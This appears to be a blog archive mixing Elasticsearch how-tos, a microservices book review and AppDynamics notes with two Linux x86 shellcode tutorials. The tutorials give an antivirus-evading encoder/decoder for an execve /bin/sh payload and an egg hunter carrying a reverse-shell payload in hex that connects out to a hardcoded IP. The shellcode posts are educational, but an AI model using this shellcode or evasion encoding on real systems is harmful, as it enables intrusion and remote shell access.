ElasticSearch: How to enable scripting on the embedded server

The goal

In this ticket I will present all the required steps in order to enable scripting on an embedded Elasticsearch server. I will not explain how to create and use an embedded server, but if you need more information you can read the ticket Embedded Elasticsearch Server for Tests.

If you execute a script within the embedded server, the following exception will be thrown:

Caused by: java.lang.IllegalArgumentException: script_lang not supported [xxxxx]
    at  org.elasticsearch.script.ScriptService.getScriptEngineServiceForLang(ScriptService.java:211)

 Code changes

 The easiest way to create an embedded server is the following one:

 Node node = NodeBuilder.nodeBuilder()
              .local(true)
              .settings(
               //add settings here
               )
              .node();

The problem with this approach is that the NodeBuilder.node() method creates a Node with an empty list of plug-ins; see the NodeBuilder code:

   /*
    * Builds the node without starting it.
    */
    public Node build() {
        return new Node(settings.build());
    }
    //Node(Settings) constructor
     /**
     * Constructs a node with the given settings.
     *
     * @param preparedSettings Base settings to configure the node with
     */
     public Node(Settings preparedSettings) {
        this(InternalSettingsPreparer
                .prepareEnvironment(preparedSettings, null),
             Version.CURRENT,
             Collections.<Class<? extends Plugin>>emptyList());
     }

In order to create a node with a list of desired plug-ins, the second constructor of the Node class should be used:

protected Node(
                Environment tmpEnv, 
                Version version, 
                Collection<Class<? extends Plugin>> classpathPlugins)

The problem with this (second) constructor is that it is protected, so we need to extend the Node class in order to use the protected constructor, and we also need to extend the NodeBuilder class in order to use the new Node class.

And here is the code:

  //PluginNode class 
  private static class PluginNode extends Node {
      public PluginNode(Settings preparedSettings, List<Class<? extends Plugin>> plugins) {
         super(InternalSettingsPreparer.prepareEnvironment(preparedSettings, null), Version.CURRENT, plugins);
      }
  }

  //PluginNodeBuilder class
  public class PluginNodeBuilder extends NodeBuilder {
        private List<Class<? extends Plugin>> plugins = new ArrayList<>();
        
        public PluginNodeBuilder() {
            super();
        }
        //new method to add plug-ins       
        public PluginNodeBuilder addPlugin(Class<? extends Plugin> plugin) {
            plugins.add(plugin);
            return this;
        }

        @Override
        //use the new PluginNode to build a node 
        public Node build() {
            return new PluginNode(settings().build(), plugins);
        }
    };

And how to use the new node builder:

 Node node = new PluginNodeBuilder()
                .addPlugin(ExpressionPlugin.class)
                .addPlugin(GroovyPlugin.class)
                .local(true)
                .settings(
                 //add settings here
                 )
                .node();

Enable scripting feature

The previous Java code alone is not sufficient to execute scripts; you must also use the right settings when the server is created and add the (Maven) dependencies to your classpath.

Server settings

 Node node = new PluginNodeBuilder()
                .addPlugin(ExpressionPlugin.class)
                .addPlugin(GroovyPlugin.class)
                .local(true)
                .settings(Settings.settingsBuilder()
                     ...
                     //this is common for all languages
                     .put("script.inline", true)

                     //these are the settings for the groovy language
                     .put("script.engine.groovy.inline.mapping", true)
                     .put("script.engine.groovy.inline.search", true)
                     .put("script.engine.groovy.inline.update", true)
                     .put("script.engine.groovy.inline.plugin", true)
                     .put("script.engine.groovy.inline.aggs", true)

                     //these are the settings for the expression language
                     .put("script.engine.expression.inline.mapping", true)
                     .put("script.engine.expression.inline.search", true)
                     .put("script.engine.expression.inline.update", true)
                     .put("script.engine.expression.inline.plugin", true)
                     .put("script.engine.expression.inline.aggs", true)
                )
                .node();

If you want more details about all the possible settings options, you can look at the ElasticSearch Scripting documentation.
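To check that everything is wired correctly, here is a minimal sketch of an inline Groovy script executed through the embedded node's client; the index, type and field names are just examples and the calls assume the Elasticsearch 2.x Java API:

import org.elasticsearch.client.Client;
import org.elasticsearch.script.Script;
import org.elasticsearch.script.ScriptService.ScriptType;

Client client = node.client();

//index a document (index, type and field names are only examples)
client.prepareIndex("test-index", "test-type", "1")
      .setSource("counter", 1)
      .setRefresh(true)
      .get();

//run an inline Groovy script that increments the counter field
client.prepareUpdate("test-index", "test-type", "1")
      .setScript(new Script(
              "ctx._source.counter += 1", //script source
              ScriptType.INLINE,          //inline script (matches script.inline: true)
              "groovy",                   //language provided by GroovyPlugin
              null))                      //no script parameters
      .get();

Without the plug-ins registered above, this call fails with the script_lang not supported exception shown at the beginning of the ticket.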

Maven dependencies

For the expression language:

       <dependency>
            <groupId>org.apache.lucene</groupId>
            <artifactId>lucene-expressions</artifactId>
            <version>5.5.2</version>
            <scope>compile</scope>
        </dependency>

       <dependency>
            <groupId>org.elasticsearch.module</groupId>
            <artifactId>lang-expression</artifactId>
            <version>2.2.0</version>
            <scope>compile</scope>
        </dependency>

For the groovy language:

<dependency>
    <groupId>org.elasticsearch.module</groupId>
    <artifactId>lang-groovy</artifactId>
    <version>2.3.2</version>
</dependency>

ElasticSearch: How to programmatically update settings of an existing index

The goal of this ticket is to show how to programmatically update the settings of an existing ElasticSearch index. I will take as example the ElasticSearch synonyms. Imagine that for a specific index, you have the following synonyms settings:

 "analysis": {
      "filter": {
        "synonym_filter": {
          "type": "synonym",
          "ignore_case": true,
          "synonyms": [
            "Romania, RO",
            "Belgium, BE"
          ]
        }
      },
....

Now, imagine (also) that you want to add a new entry into the synonyms list (“France, FR”). You could do this by using the ElasticSearch REST interface (please go here if you want to know more: Elasticsearch: updating the mappings and settings of an existing index) or you can use the Java API offered by ElasticSearch to do the same task programmatically:

//close the index before the update
client.admin().indices().close(new CloseIndexRequest(indexName)).actionGet();

//update the synonyms
client.admin().indices().prepareUpdateSettings(indexName).setSettings(
             Settings.builder()
                .put(
                        //setting prefix
                        "index.analysis.filter.synonym_filter",
                        //group name
                        "synonyms",
                        //settings
                        new String[] {"0", "1", "2"},
                        //values
                        new String []{
                                 "Romania,RO", 
                                 "Belgium,BE", 
                                 "France,FR"
                                      }
                       )
            ).get();

//open the index
client.admin().indices().open(new OpenIndexRequest(indexName)).actionGet();
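As a quick sanity check, the updated settings can be read back once the index has been reopened; this is only a sketch and assumes the same 2.x Java API as above:

import org.elasticsearch.action.admin.indices.settings.get.GetSettingsResponse;

//read back the updated settings of the index
GetSettingsResponse response = client.admin().indices()
        .prepareGetSettings(indexName)
        .get();

//the third synonym entry should now be "France,FR"
System.out.println(
        response.getSetting(indexName, "index.analysis.filter.synonym_filter.synonyms.2"));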

 

Useful links:

ElasticSearch Doc – Update Indices Settings

(Unofficial) ElasticSearch Java API for the IndicesAdminClient interface

(Unofficial) ElasticSearch Java API for the ImmutableSettings.Builder.put method

 

 

Book review: Building microservices (part 1)

This is the first part of the review of the Building Microservices book.

Chapter 1: Microservices

This first chapter is a quick introduction to microservices: the definition, the genesis of the concept and the key benefits. The microservices idea has emerged from the (new) ways of crafting software today; these new ways imply the use of domain-driven design, continuous delivery, virtualization, infrastructure automation and small autonomous teams.

The author is defining the microservices as “small, autonomous services that work together”.

The key benefits of the microservices are:

  • technology heterogeneity; use the right tool for the right job.
  • resilience; because the microservices have quite well defined service boundaries the failures do not cascade, and it is easy to quickly find and isolate the problem(s).
  • scaling; the microservices can be deployed and run independently, so it is possible to choose which microservices need special attention to be scaled accordingly.
  • ease of deployment; microservices are independent by nature, so they can be (re)deployed individually.
  • optimizing for replaceability; due to their autonomous nature, microservices can easily be replaced with new versions.

Chapter 2: The Evolutionary Architect

This chapter is about the role of the architect in the new IT landscape; for the author, the qualities of an IT architect are the following: he should have a vision and be able to communicate it very clearly; he should have empathy, so he can understand the impact of his decisions on colleagues and customers; he should be able to collaborate with others in order to define and execute the vision; he should be adaptable, so he can change the vision as the requirements change; he should be autonomous, so he can find the right balance between standardizing and enabling autonomy for the team.

For me this chapter does not fit very well in the book, because all the ideas (from the chapter) could very well be applied to monolithic systems as well.

Chapter 3: How to model services

The goal of this chapter is to split the services in the right way by finding the boundaries between services. In order to find the right service boundaries, the problem must be seen from the model point of view.

The author introduces the notion of bounded context, a notion coined by Eric Evans in the Domain-Driven Design book. Any domain consists of multiple bounded contexts, and within each one reside things that do not need to be communicated outside as well as things that should be shared externally with other bounded contexts. By thinking in terms of the model, it is possible to avoid the tight coupling pitfall. So, each bounded context represents an ideal candidate for a microservice.

This cut along bounded contexts is rather a vertical slice, but in some situations, due to technical boundaries, the cut can be done horizontally.

Chapter 4: Integration

All the ideas of this chapter revolve around three axes: inter-microservices integration, user interface integration with microservices and COTS (Commercial Off-the-Shelf Software) integration with microservices.

For the inter-microservices integration, different communication styles (synchronous versus asynchronous), different ways to manage (complex) business processes (orchestration versus choreography) and technologies (RPC, SOAP, REST) are very carefully explained with all their advantages and drawbacks. The author tends to prefer the asynchronous-choreography style using REST, but he emphasizes that there is no ideal solution.

Then some integration issues are tackled, such as the service versioning problem and how to (wisely) reuse code between microservices and/or client libraries; no one-size-fits-all solution is proposed, just different options.

For the user interface integration with microservices some interesting ideas are presented, like creating a different backend API if your microservices are used by different UI technologies (a backend API for the mobile application and a different backend API for the web application). Another interesting idea is to have services directly serving up UI components.

The integration of microservices with COTS is about the problems that a team should solve in order to integrate with COTS: lack of control (the COTS could use a different technology stack than your microservices) and difficult customization of the COTS.

Chapter 5: Splitting the Monolith

The goal of this chapter is to present some ideas about how to split a monolithic application into microservices. The first proposed step is to find portions of the code that can be treated in isolation and worked on without impacting the rest of the codebase (these portions of code are called seams, a term coined by Michael Feathers in Working Effectively with Legacy Code). The seams are the perfect candidates for the service boundaries.

In order to easily refactor the code to create the seams, the author recommends the Structure101 application, which is an ADE (Architecture Development Environment); for alternatives to Structure101 you can see Architecture Development Environment: Top 5 Alternatives to Structure101.

The rest of the chapter is about how to find seams in the database and in the code that uses it. The overall idea is that every microservice should have its own independent (DB) schema. Different problems arise if this happens, like the foreign key relationship problem, the sharing of static data stored in the DB, shared tables and the transactional boundaries. Each of these problems is discussed in detail and multiple solutions are presented.

The author recognizes that splitting the monolith is not trivial at all and that it should start very small (for the DB, for example, a first step would be to split the schema and keep the code as it was before; the second step would be to migrate some parts of the monolithic code towards microservices). He also recognizes that sometimes the splitting brings new problems (like the transactional boundaries).

Chapter 6: Deployment

This chapter presents different deployment techniques for the microservices. The first topic that is tackled is how the microservices code should be stored and how the Continuous Integration (CI) process should work; multiple options are discussed: one code repository for all microservices and one CI server; one code repository per microservice and one CI server; build pipelines per operating system or directly per platform artifact.

A second topic around the deployment is the infrastructure on which the microservices are deployed. Multiple deployment scenarios are presented: all microservices deployed on the same host, one microservice per host, virtualized hosts, dockerized hosts. The most important idea in this part is that all the deployment and host creation should be automated; automation is essential for keeping the team(s) productive.

 

 

How to write a (Linux x86) custom encoded shellcode

Goal

Very often shellcode authors will try to obfuscate the shellcode in order to bypass IDS/IPS or anti-virus software. This kind of shellcode is often called an “encoded shellcode”. The goal of this ticket is to propose a (rather simple) encoding schema and the decoding part written in assembler.

What is an encoded shellcode

An encoded shellcode is a shellcode whose payload is encoded in order to escape signature-based detection. To work correctly, the shellcode must first decode the payload and then execute it. For a very basic example you can check the A Poor Man’s Shellcode Encoder / Decoder video.

(My) custom encoder

The encoding schema that I propose is the following one:

  • the payload is split into blocks of random size between 1 and 9 bytes.
  • the first byte of each block represents the size of the block.
  • the last byte of the last block is a special character representing a terminator (0xff).

Supposing that the payload is something like:

0xaa,0xbb,0xcc,0xdd,0xee

One possible encoding version could be:

0x02,0xaa,0xbb,0x01,0xcc,0x03,0xdd,0xee,0xff

or

0x04,0xaa,0xbb,0xcc,0xdd,0x02,0xee,0xff

or

0x09,0xaa,0xbb,0xcc,0xdd,0xee,0xff

If you want to play with this encoding schema you can use the Random-Insertion-Encoder.py program, which will write the encoded shellcode for a specific shellcode to the console.
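For readers who prefer Java over Python, here is a minimal sketch of the same encoding idea; it only illustrates the schema (random block sizes between 1 and 9, a size byte in front of each block, a 0xff terminator) and is not the original Random-Insertion-Encoder.py:

import java.util.Arrays;
import java.util.Random;

public class RandomInsertionEncoder {

    //encode the payload as: [size][block bytes]...[0xff]
    static int[] encode(int[] payload) {
        Random random = new Random();
        int[] encoded = new int[2 * payload.length + 1]; //worst case: only 1-byte blocks
        int out = 0;
        int in = 0;
        while (in < payload.length) {
            //block size between 1 and 9, capped by the remaining payload
            int size = Math.min(1 + random.nextInt(9), payload.length - in);
            encoded[out++] = size;              //first byte of the block = its size
            for (int i = 0; i < size; i++) {
                encoded[out++] = payload[in++]; //copy the block bytes
            }
        }
        encoded[out++] = 0xff;                  //terminator
        return Arrays.copyOf(encoded, out);
    }

    public static void main(String[] args) {
        int[] payload = {0xaa, 0xbb, 0xcc, 0xdd, 0xee};
        for (int b : encode(payload)) {
            System.out.printf("0x%02x,", b);
        }
        System.out.println();
    }
}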

(My) custom decoder

So, the payload is initially encoded (with the custom schema) and, when the shellcode is executed, the decoder must be executed first in order to have a valid payload. The decoder will decode the payload and then pass the execution to the payload.

The first problem that the decoder should solve is to find the memory address of the encoded payload. In order to do this, we will use the “Jump Call Pop” mechanism explained in Introduction to Linux shellcode writing (Part 2) (paragraph 5.1).

The skeleton of the decoder will look like this:

global _start 
section .text
_start:
 jmp short call_shellcode
decoder:
 ; the top of the stack contains the
 ; address of the EncodedShellcode
 
 ; decoder code
call_shellcode:
 call decoder
 EncodedShellcode: db 0x06,.........,0xff

A few words before showing you the code of the decoder. The decoder basically moves bytes from right to left, skipping the first byte of each block, until the terminator byte is found. For moving the bytes, the lodsb and stosb instructions are used. These instructions use the ESI (lodsb) and EDI (stosb) registers, so you can see ESI as the source register and EDI as the destination register.

The DL register is used as a block byte counter and the CL register contains the content of the first byte of each block. So, in order to know whether all the bytes of a block have been copied, a comparison between DL and CL is done.

Special care should be taken before the ESI register is incremented, either manually or automatically by the lodsb instruction: a check should be done whether ESI points to the terminator byte, and if so the copy must stop; otherwise the decoder will try to read memory locations to which it does not have access (and the program will stop with a core dumped error).

So, here is the code of the decoder:

global _start 
section .text
_start:
 jmp short call_shellcode

decoder:
 ;get the address of the encoded shellcode
 pop esi

 ;align edi and esi
 lea edi, [esi]

handle_next_block:
 ;check that esi does not point
 ;to the terminator byte
 xor ecx,ecx
 mov cl, byte[esi]
 mov bl , cl
 xor bl, 0xff

 ;if esi points to terminator byte
 ;then execute the shellcode
 jz short EncodedShellcode

 ;otherwise skip the next byte
 ;because it's the first byte
 ;of the block and it contains
 ;the number of bytes that
 ;the block contains.
 inc esi
 
 ;dl is used to count the
 ;number of bytes from a block
 ;already copied
 xor edx, edx
 
handle_next_byte:
 ;check that esi does not point
 ;to the terminator byte
 mov bl, [esi]
 xor bl, 0xff
 
 ;if esi points to the terminator byte
 ;then execute the shellcode
 jz short EncodedShellcode
 
 ;otherwise copy the byte pointed by
 ;esi to the location pointed by edi;
 ;esi is automatically incremented by
 ;the lodsb and edi by stosb
 lodsb
 stosb
 
 ;one more byte of the block had been copied
 ;so increment the counter
 inc dl
 
 ;check that all the bytes of the block
 ;have been copied;
 ;cl contains the first byte of the block
 ;representing the number of bytes of the
 ;block and dl contains the number of
 ;block bytes already copied
 cmp cl, dl
 
 ;if not zero then not all the block bytes
 ;have been copied
 jnz handle_next_byte
 
 ;otherwise go to the next block
 jmp handle_next_block
call_shellcode:
 call decoder
 EncodedShellcode: db 0x06,0x31,0xc0,0x50,0x68,0x2f,0x2f,0x09,0x73,0x68,0x68,0x2f,0x62,0x69,0x6e,0x89,0xe3,0x01,0x50,0x07,0x89,0xe2,0x53,0x89,0xe1,0xb0,0x0b,0x01,0xcd,0x09,0x80,0xff

How to test the shellcode

In order to test the shellcode you must follow the same steps as in the previous shellcode tickets: assemble and link the decoder, extract the opcodes and embed them into the shellcode.c test program.

All the source code presented in this ticket can be found here: GitHub.


How to fix ElasticSearch client exception “A binding to org.elasticsearch.shield.transport was already configured at _unknown_. at _unknown_”

This ticket explains a possible solution for the “A binding to org.elasticsearch.shield.transport was already configured at _unknown_. at _unknown_” exception thrown when a Java ElasticSearch client tries to connect to an (ElasticSearch) cluster using Shield.

Environment

ElasticSearch version: 1.7.3

Shield version: 1.3.3

Context

The way to connect a Java ElasticSearch client to a cluster using Shield is quite straightforward; you can see the ElasticSearch documentation. The most important part (at least in the context of this problem) is the creation of the Settings instance:

Settings settings = ImmutableSettings.settingsBuilder()
                .put("cluster.name", clusterName)
                .put("shield.ssl.keystore.path", jksPath)
                .put("shield.ssl.keystore.password", jksPassword)
                .put("shield.transport.ssl", "true")
                .put("plugin.types", "org.elasticsearch.shield.ShieldPlugin")
                .build();
......

When the client is executed, the following strange stacktrace is thrown:

Full stacktrace

1) A binding to org.elasticsearch.shield.transport.filter.IPFilter was already configured at _unknown_.
  at _unknown_
2) A binding to org.elasticsearch.shield.transport.ClientTransportFilter was already configured at _unknown_.
  at _unknown_
3) A binding to org.elasticsearch.shield.ssl.ClientSSLService was already configured at _unknown_.
  at _unknown_
4) A binding to org.elasticsearch.shield.ssl.ServerSSLService was already configured at _unknown_.
  at _unknown_
4 errors
       at org.elasticsearch.common.inject.internal.Errors.throwCreationExceptionIfErrorsExist(Errors.java:344)
       at org.elasticsearch.common.inject.InjectorBuilder.initializeStatically(InjectorBuilder.java:151)
       at org.elasticsearch.common.inject.InjectorBuilder.build(InjectorBuilder.java:102)
       at org.elasticsearch.common.inject.Guice.createInjector(Guice.java:93)
       at org.elasticsearch.common.inject.Guice.createInjector(Guice.java:70)
       at org.elasticsearch.common.inject.ModulesBuilder.createInjector(ModulesBuilder.java:59)
       at org.elasticsearch.client.transport.TransportClient.<init>(TransportClient.java:195)
       at org.elasticsearch.client.transport.TransportClient.<init>(TransportClient.java:125)

 

Root cause

The root cause of this problem is the line:

.put("plugin.types", "org.elasticsearch.shield.ShieldPlugin")

If this line is removed then the problem is solved. This property should only be used with the 2.0 version of Shield, not with the 1.3.3 version.
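For completeness, here is a hedged sketch of the working 1.7.x / Shield 1.3.x client setup, i.e. the same settings as above minus the plugin.types line; the host name and port are placeholders:

import org.elasticsearch.client.transport.TransportClient;
import org.elasticsearch.common.settings.ImmutableSettings;
import org.elasticsearch.common.settings.Settings;
import org.elasticsearch.common.transport.InetSocketTransportAddress;

Settings settings = ImmutableSettings.settingsBuilder()
        .put("cluster.name", clusterName)
        .put("shield.ssl.keystore.path", jksPath)
        .put("shield.ssl.keystore.password", jksPassword)
        .put("shield.transport.ssl", "true")
        //no plugin.types entry; Shield 1.x is picked up from the classpath
        .build();

TransportClient client = new TransportClient(settings);
client.addTransportAddress(new InetSocketTransportAddress("es-host", 9300));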

The moral of this story? First of all, you should use the right version of the ElasticSearch documentation (in my case I was running the 1.7.3 version but I used the documentation for 2.0). The second point is that the ElasticSearch API is not very user friendly (I even dare to say that it is badly designed). I would have preferred the ImmutableSettings.Builder class to have a put method that takes a Java enum as the first parameter rather than a Java String.
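To illustrate that last remark, a type-safe put could look like the (purely hypothetical) sketch below; the ShieldSetting enum and the SafeSettingsBuilder wrapper are invented for this example and are not part of the ElasticSearch API:

//hypothetical enum of known setting keys (not part of the ElasticSearch API)
enum ShieldSetting {
    CLUSTER_NAME("cluster.name"),
    KEYSTORE_PATH("shield.ssl.keystore.path"),
    KEYSTORE_PASSWORD("shield.ssl.keystore.password"),
    TRANSPORT_SSL("shield.transport.ssl");

    final String key;

    ShieldSetting(String key) {
        this.key = key;
    }
}

//hypothetical wrapper that delegates to the real String-based put method
class SafeSettingsBuilder {
    private final org.elasticsearch.common.settings.ImmutableSettings.Builder builder =
            org.elasticsearch.common.settings.ImmutableSettings.settingsBuilder();

    SafeSettingsBuilder put(ShieldSetting setting, String value) {
        builder.put(setting.key, value);
        return this;
    }

    org.elasticsearch.common.settings.Settings build() {
        return builder.build();
    }
}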

AppDynamics Pro – basics

The goal of this ticket is to present and explain the basic notions of the AppDynamics Pro product.

  • Node – a node is the basic unit of processing that AppDynamics monitors. A node is instrumented by an AppDynamics agent.
  • Tier – a tier represents an instrumented service or multiple services that perform the exact same functionality. It represents a more logical view of the application. A tier is composed of one or multiple nodes.
  • Application – multiple tiers gathered together.
  • Business Transaction – represents a distinct logical user activity. The entire application traffic is organized in Business Transactions.
  • Transaction Snapshot – set of diagnostic data, taken at a certain point in time, for a specific Business Transaction across all the tiers through which the transaction has passed. The Transaction Snapshots are triggered periodically (every 10 minutes) or automatically for slow and error business transactions.
  • Metrics – application performance information sent from the App Server Agents and Machine Agents to the controller.
  • Baselines – set of metrics within a time range.
  • Baseline Deviations – degree of deviation from baseline at any given point in time and by default are calculated by a number of standard deviations above the average.
  • Service Endpoint – performance metrics focused on a particular service or set of services independent of business transactions.
  • Health Rule – defines a condition or set of conditions in terms of metrics. The condition compares the performance metrics that AppDynamics collects with some static or dynamic threshold that you define. If performance exceeds the threshold, a health rule violation event is triggered. There are two types of thresholds: Warning and Critical.
  • Diagnostic Session – the goal is to collect extra Transaction Snapshots for one or more Business Transactions for a period of time.
  • Events – emitted when the application state changes. There are eight types of events:
    • Health rules violation
    • Too many slow transactions
    • Too many errors
    • Code problems
    • Application changes
    • JVM and CLR (.NET) Crashes
    • AppDynamics Config Warnings
    • Discovery (new application, tier or node discovered)
  • Errors – AppDynamics treats the following events as errors:
    • unhandled exceptions
    • HTTP error codes from 400 to 505 (the error codes to catch are configurable)
    • Error or Fatal logging events (Log4j or java.util.logging)
  • Information Points – collect metrics outside the context of Business Transactions and across several Business Transactions. For me it looks similar to the Service Endpoints.
  • Data Collectors – collect extra information at the Business Transaction level, like application code arguments, return values and variables, and display the information in the Call Drill Down panels. There are two types of Data Collectors: method invocation data collectors and HTTP data collectors.

How to write a (Linux x86) egg hunter shellcode

Goal

The goal of this ticket is to write an egg hunter shellcode. An egg hunter is a piece of code that, when executed, looks for another (usually bigger) piece of code called the egg and passes the execution to it. This technique is usually used when the space available for executing the shellcode is limited (the available space is smaller than the egg) and it is possible to inject the egg at another memory location. Because the egg is injected at a non-static memory location, the egg must start with an egg tag in order to be recognized by the egg hunter.

1. How to test the shellcode

Maybe it will look odd, but I will start by presenting the program that will be used to test the egg hunter. The test program is a modified version of the shellcode.c used in the previous tickets.

#include<stdio.h>
#include<string.h>

#define EGG_TAG "hex version of egg_tag; to be added later"
unsigned char egg_hunter[]= "hex version of egg_hunter; to be added later";
unsigned char egg[] = EGG_TAG EGG_TAG "hex version of egg; to be added later";
int main()
{
    int (*ret)() = (int(*)())egg_hunter;
    ret();
}

We start by defining the egg tag, the egg hunter and the egg; the egg is prefixed twice with the egg tag in order to be recognized by the egg hunter. The main program will just pass the execution to the egg hunter, which will search for the egg (somewhere in the memory space of the program) and then pass the execution to the egg.

Usually the egg tag is eight bytes, and the reason it repeats itself is that it allows the egg hunter to be more optimized for size: it can search for a single four-byte value that appears twice, one occurrence right after the other. This eight-byte version of the egg tag tends to allow enough uniqueness that it can be easily selected without running any high risk of a collision.

2. Implementation

2.1 Define the egg tag

Defining the egg tag is quite easy; it is up to you to choose a rather unique word. In our case the egg tag is egg1. In order to be used by the egg hunter, the tag must be transformed into hex. I just crafted a small script, fromStringToAscii.sh, that transforms the input from characters to their ASCII equivalents and then to the hex value. So in our case the egg tag value will be 0x31676765.
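If you do not have the script at hand, a small Java sketch of the same conversion (assuming the little-endian byte order used by the x86 egg hunter) could look like this:

public class EggTagToHex {
    public static void main(String[] args) {
        String tag = "egg1"; //the four-character egg tag

        //build the 32-bit value byte by byte, in little-endian order
        long value = 0;
        for (int i = 0; i < tag.length(); i++) {
            value |= ((long) tag.charAt(i)) << (8 * i);
        }

        System.out.printf("0x%08x%n", value); //prints 0x31676765
    }
}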

2.2 Implement the egg hunter

What the egg hunter implementation should do is first find the addressable space allocated to the host process (the process in which the egg hunter is embedded), then search inside this addressable space for the egg and finally pass the execution to the egg.

On Linux this behavior can be achieved using the access(2) system call. The egg hunter will systematically call the access system call in order to find the memory pages to which the host process has access, and once an accessible page is found, it looks for the egg. Here is the implementation code:

global _start
section .text
_start:
 xor edx,edx
next_page:
 ;align edx to the last address of the
 ;current page (PAGE_SIZE = 0x1000 = 4096)
 or dx,0xfff
next_address:
 ;move to the next address to check
 inc edx
 ;load the page memory address to ebx
 lea ebx,[edx+0x4]
 ;0x21=33 access system call number
 push byte +0x21
 pop eax
 int 0x80

 ;compare the result with EFAULT
 cmp al,0xf2
 jz next_page 
 mov eax,0x31676765; this is the egg marker: egg1 in hex
 mov edi,edx
 ;search for the first occurrence of the egg tag
 scasd
 jnz next_address
 ;search for the second occurrence of the egg tag 
 scasd
 jnz next_address
 ;execute the egg 
 jmp edi

A much more detailed explanation of how this egg hunter works can be found in Safely Searching Process Virtual Address Space.

3. Putting it all together

Now we have all the missing pieces, so we can put them together. As the egg I used the reverse connection shellcode from How to write a reverse connection shellcode. The final result is something like:

#include<stdio.h>
#include<string.h>

#define PORT_NUMBER "\x6a\xff" // 0xffff
#define IP_ADDRESS "\x0c\x12\x01\x17"
#define EGG_TAG "\x65\x67\x67\x31"

unsigned char egg_hunter[]=
"\x31\xd2\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\x6a\x21\x58"
"\xcd\x80\x3c\xf2\x74\xee\xb8"
EGG_TAG
"\x89\xd7\xaf\x75\xe9\xaf\x75\xe6\xff\xe7";

unsigned char egg[] =
EGG_TAG
EGG_TAG
"\x31\xc0\x31\xdb\xb0\x66\x53\x6a\x01\x6a\x02\x89\xe1\xb3\x01\xcd\x80\x89\xc6\xe8\x01"
"\x00\x00\x00\xc3\x31\xc0\x31\xdb\xb0\x66\x68"
IP_ADDRESS
"\x66"
PORT_NUMBER
"\x66\x6a\x02\x89\xe1\xb3\x03\x6a\x10\x51\x56\x89\xe1\xcd\x80\xe8\x01\x00\x00\x00"
"\xc3\x31\xc0\x31\xdb\xb0\x3f\x89\xf3\x31\xc9\xcd\x80\x31\xc0\x31\xdb\xb0\x3f\x89"
"\xf3\x41\xcd\x80\x31\xc0\x31\xdb\xb0\x3f\x89\xf3\x41\x41\xcd\x80\xe8\x01\x00\x00"
"\x00\xc3\x31\xc0\x31\xdb\x31\xc9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89"
"\xe3\x50\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80\xc3\xe8\x78\xff\xff\xff";

int main()
{
 printf("EggHunter Length: %d\n", strlen(egg_hunter));
 printf("Shellcode Length: %d\n", strlen(egg));
 int (*ret)() = (int(*)())egg_hunter;
 ret();
}

All the source code presented in this ticket can be found here: GitHub.
